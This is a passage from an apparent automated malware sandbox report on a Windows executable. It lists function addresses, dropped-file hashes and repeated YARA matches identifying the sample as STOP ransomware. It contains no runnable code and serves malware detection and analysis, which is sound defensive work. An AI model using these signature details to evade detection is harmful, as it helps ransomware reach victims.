          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00449FE32_2_00449FE3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022372205_2_02237220
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022B22C05_2_022B22C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0227E37C5_2_0227E37C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022373935_2_02237393
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223A0265_2_0223A026
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0224F0305_2_0224F030
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223B0005_2_0223B000
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223B0B05_2_0223B0B0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022370E05_2_022370E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022330EE5_2_022330EE
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022400D05_2_022400D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022391205_2_02239120
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0227E1415_2_0227E141
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0225D1A45_2_0225D1A4
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0227B69F5_2_0227B69F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223A6995_2_0223A699
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223E6E05_2_0223E6E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223C7605_2_0223C760
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223A79A5_2_0223A79A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0225D7F15_2_0225D7F1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022375205_2_02237520
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223CA105_2_0223CA10
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02237A805_2_02237A80
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02240B005_2_02240B00
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02232B605_2_02232B60
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223DBE05_2_0223DBE0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022378805_2_02237880
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022518D05_2_022518D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0224A9305_2_0224A930
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0223A9165_2_0223A916
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0225E9A35_2_0225E9A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_0225F9B05_2_0225F9B0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022359F75_2_022359F7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_022389D05_2_022389D0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02238E605_2_02238E60
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02264E9F5_2_02264E9F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02272D1E5_2_02272D1E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02235DE75_2_02235DE7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02235DF75_2_02235DF7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0042E0036_2_0042E003
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040D2406_2_0040D240
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0041E6906_2_0041E690
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040F7306_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004819206_2_00481920
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00419F906_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0506_2_0050D050
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004050576_2_00405057
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040C0706_2_0040C070
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0042F0106_2_0042F010
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0086_2_0050D008
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004080306_2_00408030
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0286_2_0050D028
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004070E06_2_004070E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0906_2_0050D090
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0A86_2_0050D0A8
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004101606_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004C81136_2_004C8113
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004021C06_2_004021C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004C93436_2_004C9343
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004054476_2_00405447
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004054576_2_00405457
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004084C06_2_004084C0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C4E06_2_0050C4E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004344FF6_2_004344FF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004495066_2_00449506
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0043E5A36_2_0043E5A3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0044B5B16_2_0044B5B1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040A6606_2_0040A660
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004096866_2_00409686
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004067406_2_00406740
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040274E6_2_0040274E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040A7106_2_0040A710
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004087806_2_00408780
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0044D7A16_2_0044D7A1
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0042C8046_2_0042C804
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004068806_2_00406880
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C9606_2_0050C960
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C9286_2_0050C928
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0044D9DC6_2_0044D9DC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004069F36_2_004069F3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C9886_2_0050C988
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C9A86_2_0050C9A8
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00449A716_2_00449A71
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_004E1AB06_2_004E1AB0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00443B406_2_00443B40
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CB786_2_0050CB78
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00406B806_2_00406B80
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00409CF96_2_00409CF9
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0044ACFF6_2_0044ACFF
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040DD406_2_0040DD40
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00427D6C6_2_00427D6C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CD606_2_0050CD60
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040BDC06_2_0040BDC0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CDF06_2_0050CDF0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00409DFA6_2_00409DFA
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CE586_2_0050CE58
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0042CE516_2_0042CE51
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00406EE06_2_00406EE0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00409F766_2_00409F76
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00420F306_2_00420F30
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CF286_2_0050CF28
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CFC06_2_0050CFC0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00449FE36_2_00449FE3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CF906_2_0050CF90
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe 26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\sqlite3[1].dll 4841020C8BD06B08FDE6E44CBE2E2AB33439E1C8368E936EC5B00DC0584F7260
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00428C81 appears 76 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00420EC2 appears 40 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 004076FD appears 38 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 02298EC0 appears 57 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00404964 appears 52 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 02260160 appears 46 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 02258EC0 appears 57 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 004547A0 appears 64 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00422587 appears 48 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 0042F7C0 appears 123 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 0044F23E appears 108 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00428520 appears 140 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00450870 appears 52 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 00454E50 appears 62 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 022A0160 appears 46 times
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: String function: 0044F26C appears 41 times
          Source: sqlite3[1].dll.15.drStatic PE information: Number of sections : 18 > 10
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeSection loaded: nss3.dll
          Source: E0tabE4K4r.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 20.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 20.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 20.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 20.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.E0tabE4K4r.exe.22315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 17.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 17.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 19.2.E0tabE4K4r.exe.22c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.E0tabE4K4r.exe.22715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 17.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 17.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.E0tabE4K4r.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
